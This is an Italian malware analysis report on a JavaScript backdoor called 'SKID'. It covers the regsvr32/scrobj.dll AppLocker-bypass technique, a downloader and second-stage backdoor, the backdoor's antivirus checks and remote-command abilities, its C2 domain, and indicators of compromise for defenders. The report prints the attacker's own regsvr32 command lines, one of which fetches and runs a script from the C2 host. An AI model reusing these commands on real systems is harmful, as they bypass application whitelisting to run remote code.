SKID: La nuova Backdoor JavaScript

threat

Svolgendo un’analisi su un EndPoint di un nostro Cliente è stata identificata una nuova minaccia che sfrutta una recente tecnica di exploit del S.O. Microsoft Windows scoperta nell’aprile 2016, identificata come “Applocker Bypass”.
La presente minaccia analizzata, viene soprannominata “SKID” in quanto nel codice sono presenti diverse parole chiave con questo nome.
Vengono inoltre resi pubblici gli indicatori di compromissione per individuare possibili EndPoint compromessi.

APPLOCKER BYPASS – EXPLOITING TECHNIQUES

La nuova minaccia identificata come “SKID” utilizza una recente tecnica di exploit del S.O. Windows chiamata “Applocker Bypass”; grazie a questa tecnica è possibile eseguire script VB o JS utilizzando il processo di sistema (processo sano e in whitelist) regsvr32.exe.

La tecnica scoperta nell’aprile del 2016 è documentata in dettaglio nei seguenti link:

http://www.subt0x10.blogspot.it/2016/04/bypass-application-whitelisting-script.html

http://betanews.com/2016/04/25/bypass-applocker-security/

Sull’Endpoint vittima è stato tracciato questo meccanismo, il quale veniva sfruttato per eseguire un file javascript presente nella cartella dell’utente vittima.

SKID” utilizza la seguente linea di comando per attivarsi:

regsvr32.exe /s /n /u /i:”C:\Users[username]\AppData\Roaming\9DB0F2C13D.txt” scrobj.dll

FIRST STAGE – JAVASCRIPT DOWNLOADER

Il file analizzato ha le seguenti caratteristiche:
File name: 9DB0F2C13D.txt
File path: C:\Users\[username]\AppData\Roaming\
File size: 14646 Bytes
MD5: 28DD8E548FAE06C9114D1593150F3860

Dalle prime righe dell’header del file è possibile notare che si tratta di uno script in Javascript, tale codice risulta però offuscato.

Di seguito sono elencate le evidenze ottenute dopo aver de-offuscato il file:

  • E’ presente una funzione che controlla la raggiungibilità internet, effettuando una richiesta http verso l’host update.microsoft.com
  • La Backdoor esegue delle richieste http GET verso l’host 8.8.8.8
  • Legge la chiave di registro HKEY_CURRENT_USER\Software\Microsoft\Notepad\ nel quale è possibile trovare riferimenti alla Backdoor installata
  • Verifica se la minaccia è installata, controllando tramite WMI se il processo regsvr32 risulta in esecuzione
  • Lo script scarica una vera e propria Backdoor javascript dal seguente indirizzo hxxps://webmail.xcloud.kz/js/changelog.txt nella cartella dell’utentde C: \Users \ AppData .txt per poi eseguirla sul sistema, utilizzando la tecnica di exploiting “Applocker Bypass“, con il seguente comando:  C: \windows \system32 \regsvr32.exe” /s/n/u/i:https://webmail.xcloud.kz/js/changelog.txt scrobj.dll 

Questo primo file risulta quindi essere un vero e proprio downloader, creato ad-hoc per poter sfruttare la tecnica di exploiting descritta in precedenza.

SECOND STAGE – JAVASCRIPT BACKDOOR

Il secondo file analizzato ha le seguenti caratteristiche, ed è una vera e propria Backdoor sviluppata in javascript, giunta alla versione 2.0:
File name: changelog.txt
Downloaded from: hxxps://webmail.xcloud.kz/js/changelog.txt
File size: 43686 Bytes
MD5: 09BCF50D498C67942A4F70FDD72D2913

Come per il primo file, anche per questo file l’header è molto simile.

Il file javascript risulta offuscato, ed è stato de-offuscato il codice in modo da analizzare le caratteristiche del malware:
La Backdoor è in grado di ricavare le seguenti informazioni:

  • Sistema Operativo e architettura (32 o 64 bit)
  • Riconosce se sul sistema + installato ed in esecuzione uno dei seguenti antivirus:
  1. Windows Defender
  2. McAfee
  3. Avast
  4. Avira
  5. AVG
  6. TrendMicro
  7. Panda
  8. F-Secure
  9. Kaspersky
  10. Symantec
  11. Sophos
  12. Bitdefender
  13. ESET
  14. Comodo
  15. MalwareBytes
  16. Norton
  17. ClamAV
  18. TrusteerRapport
  19. DeepFreeze
  20. 360 Total Security
  21. Seqrite EndPoint Security
  22. Quick Heal
  23. Fortinet
  24. Bitdefender Endpoint Security
  25. ByteFence
  26. G-Data
  27. Webroot
  • Il serial number del computer
  • IP locale del PC
  • Versione della Backdoor installata (al momento dell’analisi risulta v2.0)

La Backdoor fornisce all’attaccante la possibilità di eseguire i seguenti task:

  • Download ed esecuzione di file binari (.exe e .dll)
  • Download ed esecuzione di script .js o .vbs utilizzando la tecnica di exploiting “AppLocker Bypass
  • Rimozione della persistenza sul PC vittima
  • Esecuzione di comandi remoti sul PC vittima

CnC – DOMAIN ANALYSIS

Il CnC identificato risulta essere il seguente:
Hostname: webmail.xcloud.kz
IP: 82.211.34.91
Il dominio xcloud.kz è stato registrato il 15 Novembre 2016 e, anche il certificato SSL dell’host webmail.xcloud.kz, appare valido dal 15 Novembre 2016 al 16 Novembre 2017.
Da questi dati è possibile ipotizzare che l’attacker abbia implementato e distribuito le prime versioni della Backdoor verso la fine del 2016.

INDICATORS OF COMPROMISE

Di seguito vengono forniti gli IOC utili per svolgere indagini e verificare la presenza della possibile minaccia su ulteriori Endpoint

– MD5
28DD8E548FAE06C9114D1593150F3860
09BCF50D498C67942A4F70FDD72D2913

– NETWORK ACTIVITY
CnC IP: 82.211.34.91
CnC hostname: webmail.xcloud.kz
CnC URL: hxxps://webmail.xcloud.kz/js/ajax.php
Comportamento anomalo: connessioni in uscita verso 8.8.8.8 (Google IP) su porta 80, protocollo HTTP

– REGISTRY KEYS
HKEY_CURRENT_USER\Software\Microsoft\Notepad\